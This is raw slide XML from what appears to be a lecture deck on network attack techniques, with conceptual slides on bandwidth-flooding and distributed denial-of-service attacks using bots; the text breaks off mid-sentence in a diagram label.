            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E29D8036-CE07-4FF3-B636-2D5E8EAF6FF1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="16256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Overwhelming link bandwidth with packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2667000"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack traffic can be made similar to legitimate traffic, hindering detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flow of traffic must consume target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s bandwidth resources. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker needs to engage more than one machine =&gt; DDoS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>May be easier to get target to fill-up its upstream bandwidth: async access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example: attacking BitTorrent seeds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168400" y="4572000"/>
            <a:ext cx="11053763" cy="1936750"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="0" cap="none">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NETWORK ATTACK TECHNIQUES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A4EEF851-3DC9-41A9-ADB2-FB39AF52758B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA12D784-0E3B-44A0-B9A9-A7E6B47C6288}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11053763" cy="9144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Distributed DoS: DDos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30724" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3659188" y="3721100"/>
            <a:ext cx="1735137" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30754" name="Freeform 4"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="30755" name="Object 5"/>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spid="_x0000_s30872" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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30725" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4673600" y="2133600"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30752" name="Freeform 7"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="30753" name="Object 8"/>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spid="_x0000_s30873" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">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30726" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3538538" y="5691188"/>
            <a:ext cx="1733550" cy="1649412"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30750" name="Freeform 10"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="30751" name="Object 11"/>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spid="_x0000_s30874" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">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30727" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4930775" y="7769225"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30748" name="Freeform 13"/>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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="30749" name="Object 14"/>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spid="_x0000_s30875" name="Clip" r:id="rId7" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="1307079" imgH="1083682" progId="">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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30728" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6316663" y="3686175"/>
            <a:ext cx="4244975" cy="430371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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="30729" name="Object 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11122025" y="5876925"/>
          <a:ext cx="868363" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s30876" name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">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22025" y="5876925"/>
                        <a:ext cx="868363" cy="741363"/>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0730" name="Object 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1335088" y="4770438"/>
          <a:ext cx="868362" cy="741362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s30877" name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">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5088" y="4770438"/>
                        <a:ext cx="868362" cy="741362"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="30731" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7575550" y="5667375"/>
            <a:ext cx="1263650" cy="484188"/>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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30732" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6064250" y="3113088"/>
            <a:ext cx="4992688" cy="2881312"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30733" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5153025" y="4554538"/>
            <a:ext cx="5867400" cy="1649412"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30734" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5097463" y="6346825"/>
            <a:ext cx="5959475" cy="33338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30735" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6434138" y="6592888"/>
            <a:ext cx="4640262" cy="1651000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30736" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2251075" y="3182938"/>
            <a:ext cx="2689225" cy="1651000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30737" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2393950" y="4711700"/>
            <a:ext cx="1562100" cy="474663"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30738" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2338388" y="5413375"/>
            <a:ext cx="1528762" cy="739775"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30739" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2111375" y="5572125"/>
            <a:ext cx="3198813" cy="2813050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30740" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1055688" y="5653088"/>
            <a:ext cx="1314450"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attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30741" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11104563" y="6604000"/>
            <a:ext cx="1030287"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victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30742" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5359400" y="8686800"/>
            <a:ext cx="673100"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bot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30743" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3987800" y="6629400"/>
            <a:ext cx="673100"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bot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30744" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4216400" y="4572000"/>
            <a:ext cx="673100"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bot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30745" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5130800" y="3048000"/>
            <a:ext cx="673100"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bot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30746" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7531100" y="2101850"/>
            <a:ext cx="5029200" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker takes over many machines, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Potential bots are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>machines with vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30747" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016000" y="7445375"/>
            <a:ext cx="3443288" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bot processes wait </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for command from </a:t>
            </a:r>
          </a:p>
          <a:p>
